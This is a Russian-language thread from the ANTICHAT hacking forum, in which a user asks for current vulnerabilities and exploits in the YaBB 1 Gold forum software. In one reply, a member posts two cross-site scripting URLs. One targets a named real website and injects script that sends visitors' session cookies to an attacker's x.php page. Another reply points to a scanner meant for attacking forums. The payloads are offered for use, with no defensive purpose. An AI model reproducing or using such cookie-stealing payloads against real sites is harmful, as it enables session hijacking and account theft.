HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости форума YaBB 1 Gold - Release и сплойты к нему
  #1  
Старый 03.01.2006, 21:20
asma2k
Новичок
Регистрация: 18.03.2005
Сообщений: 4
С нами: 11129527

Репутация: 0
Exclamation Уязвимости форума YaBB 1 Gold - Release и сплойты к нему

Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

Может,кто что новое подскажет?
 
Ответить с цитированием

  #2  
Старый 05.01.2006, 07:26
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию

Да, там можно межсайтовый скриптинг произвести, вот пример:
Код:
http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>
Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 
%2b(document.cookie)%3b</Script>
P.S. прошу прощения за флуд.
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 19:11
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
С нами: 10953146

Репутация: 11
По умолчанию

Цитата:
Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 
%2b(document.cookie)%3b</Script>
Эт ты где такую урлу надыбал?)
 
Ответить с цитированием

  #4  
Старый 05.01.2006, 21:53
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию

Цитата:
Сообщение от WizART  
Эт ты где такую урлу надыбал?)
на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 19:18
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

это всё пасивные)))жаль
 
Ответить с цитированием

  #6  
Старый 06.01.2006, 02:00
Ricky
Banned
Регистрация: 04.01.2006
Сообщений: 10
С нами: 10709606

Репутация: 2
По умолчанию

Цитата:
Сообщение от asma2k  
Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

Может,кто что новое подскажет?
http://forum.antichat.ru/thread11807.html

Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про уязвимости в YaBB 1 Gold - SP1 netgenom Уязвимости CMS / форумов 1 04.11.2004 14:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...